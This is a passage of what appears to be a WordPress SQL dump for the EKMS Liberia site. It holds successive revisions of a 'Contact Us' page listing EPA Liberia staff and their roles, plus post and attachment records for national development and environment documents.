></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 12:42:32','2019-11-15 12:42:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2306,1,'2019-11-15 12:42:44','2019-11-15 12:42:44','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-13.jpg\" alt=\"team-13.jpg\" ></figure>		\n		<h3>John Borthwick</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\" ></figure>		\n		<h3>Mary Scott</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 12:42:44','2019-11-15 12:42:44','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2307,1,'2019-11-15 12:44:23','2019-11-15 12:44:23','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-13.jpg\" alt=\"team-13.jpg\" ></figure>		\n		<h3>John Borthwick</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\" ></figure>		\n		<h3>Mary Scott</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 12:44:23','2019-11-15 12:44:23','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2308,1,'2019-11-15 12:44:53','2019-11-15 12:44:53','<h2>Contact Us</h2>\nPlease contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>\n<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-13.jpg\" alt=\"team-13.jpg\"></figure>\n<h3>John Borthwick</h3>\nFounder &amp; CEO\n\nLorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\n<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\"></figure>\n<h3>Mary Scott</h3>\nFounder &amp; CEO\n\nLorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\n<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\"></figure>\n<h3>David Anderson</h3>\nFounder &amp; CEO\n\nLorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\n<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\"></figure>\n<h3>Tom Allen</h3>\nFounder &amp; CEO\n\nLorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 12:44:53','2019-11-15 12:44:53','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2309,1,'2019-11-15 13:06:27','2019-11-15 13:06:27','The Pro-Poor Agenda for Prosperity and Development 2018 to 2023 (PAPD) is the second in the series of 5-year National Development Plans (NDP) anticipated under the Liberia Vision 2030 framework. It follows the Agenda for Transformation 2012-2017 (AfT). It is informed as well by lessons learned from the implementation of the Interim Poverty Reduction Strategy 2007 (iPRS) and the Poverty Reduction Strategy (2008-2011).','Pro Poor Agenda for Prosperity and Development','','publish','closed','closed','','pro-poor-agenda-for-prosperity-and-development','','','2022-12-06 11:10:41','2022-12-06 11:10:41','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2309',116,'document','',0),(2311,1,'2019-11-15 13:02:06','2019-11-15 13:02:06','','State of the Environment 2006 Liberia','','inherit','open','closed','','state-of-the-environment-2006-liberia-2','','','2019-11-15 13:02:06','2019-11-15 13:02:06','',2309,'https://ekmsliberia.info/wp-content/uploads/2019/11/State-of-the-Environment-2006-Liberia-1.pdf',0,'attachment','application/pdf',0),(2312,1,'2019-11-15 13:03:13','2019-11-15 13:03:13','','PAPD pro-poor agenda for prosperity and development','','inherit','open','closed','','papd-pro-poor-agenda-for-prosperity-and-development','','','2019-11-15 13:03:13','2019-11-15 13:03:13','',2309,'https://ekmsliberia.info/wp-content/uploads/2019/11/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf',0,'attachment','application/pdf',0),(2313,1,'2019-11-15 13:09:17','2019-11-15 13:09:17','','JS Datuama Cammue','','inherit','open','closed','','knowledge_broker_dc','','','2019-11-16 03:53:44','2019-11-16 03:53:44','',80,'https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg',0,'attachment','image/jpeg',0),(2314,1,'2019-11-15 13:14:59','2019-11-15 13:14:59','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"knowledge_broker_DC\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>UNCBD Focal Point\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:14:59','2019-11-15 13:14:59','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2315,1,'2019-11-15 13:16:11','2019-11-15 13:16:11','','Ujah Vah','','inherit','open','closed','','knowledge_manager_uv','','','2019-11-16 03:53:29','2019-11-16 03:53:29','',80,'https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg',0,'attachment','image/jpeg',0),(2316,1,'2019-11-15 13:18:33','2019-11-15 13:18:33','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"knowledge_broker_DC\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>UNCBD Focal Point\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:18:33','2019-11-15 13:18:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2317,1,'2019-11-15 13:22:30','2019-11-15 13:22:30','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"knowledge_broker_DC\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>MEAs Officer<p>The Focal Point of the United Nations Convention on Biological Diversity</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:22:30','2019-11-15 13:22:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2318,1,'2019-11-15 13:24:57','2019-11-15 13:24:57','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"knowledge_broker_DC\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>MEAs Officer<p>The Focal Point of the United Nations Convention on Biological Diversity</p>\n		<h3>Berexford S Jallah</h3>GIS Supervisor<p>The Focal Point of the United Nations Convention on Biological Diversity</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:24:57','2019-11-15 13:24:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2319,1,'2019-11-15 13:25:19','2019-11-15 13:25:19','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"knowledge_broker_DC\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>MEAs Officer<p>The Focal Point of the United Nations Convention on Biological Diversity</p>\n		<h3>Berexford S Jallah</h3>GIS Supervisor<p>The Focal Point of the United Nations Convention to Combat Desertification</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" ></figure>		\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:25:19','2019-11-15 13:25:19','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2321,1,'2019-11-15 13:41:01','2019-11-15 13:41:01','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"knowledge_broker_DC\" ></figure>		\n		<h3>J.S. Datuama Cammue</h3>MEAs Officer<p>The Focal Point of the United Nations Convention on Biological Diversity</p>\n		<h3>Berexford S Jallah</h3>GIS Supervisor<p>The Focal Point of the United Nations Convention to Combat Desertification</p>\n		<h3>Benjamin Karmorh</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n		<h3>Tom Allen</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:41:01','2019-11-15 13:41:01','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2322,1,'2019-11-15 13:48:20','2019-11-15 13:48:20','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		J.S. Datuama Cammue\n<br>\nMEAs Officer\n<br>\nThe Focal Point of the United Nations Convention on Biological Diversity\n<br>\n<a href=\"mailto:jcammue@epa.gov.lr>jcammue@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:48:20','2019-11-15 13:48:20','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2323,1,'2019-11-15 13:50:27','2019-11-15 13:50:27','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>J.S. Datuama Cammue</strong></p><p>MEAs Officer</p><p>Focal Point of the United Nations Convention on Biological Diversity</p><p><a style=\"color: #000000;\" href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:50:27','2019-11-15 13:50:27','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2324,1,'2019-11-15 13:52:29','2019-11-15 13:52:29','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>J.S. Datuama Cammue</strong>\nMEAs Officer\nFocal Point of the United Nations Convention on Biological Diversity\n<br>\n<a href=\"jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:52:29','2019-11-15 13:52:29','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2325,1,'2019-11-15 13:52:47','2019-11-15 13:52:47','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>J.S. Datuama Cammue</strong>\nMEAs Officer\nFocal Point of the United Nations Convention on Biological Diversity\n<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:52:47','2019-11-15 13:52:47','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2326,1,'2019-11-15 13:53:17','2019-11-15 13:53:17','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>J.S. Datuama Cammue</strong>\n<br>\nMEAs Officer\n<br>\nFocal Point of the United Nations Convention on Biological Diversity\n<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:53:17','2019-11-15 13:53:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2327,1,'2019-11-15 13:55:45','2019-11-15 13:55:45','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>J.S. Datuama Cammue</strong>\n<br>\nMEAs Officer\n<br>\nFocal Point of the United Nations Convention on Biological Diversity\n<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\nMEAs Officer\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 13:55:45','2019-11-15 13:55:45','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2328,1,'2019-11-15 14:02:24','2019-11-15 14:02:24','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:02:24','2019-11-15 14:02:24','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2330,1,'2019-11-15 14:21:59','2019-11-15 14:21:59','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_DC-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:21:59','2019-11-15 14:21:59','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2333,1,'2019-11-15 14:42:33','2019-11-15 14:42:33','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" 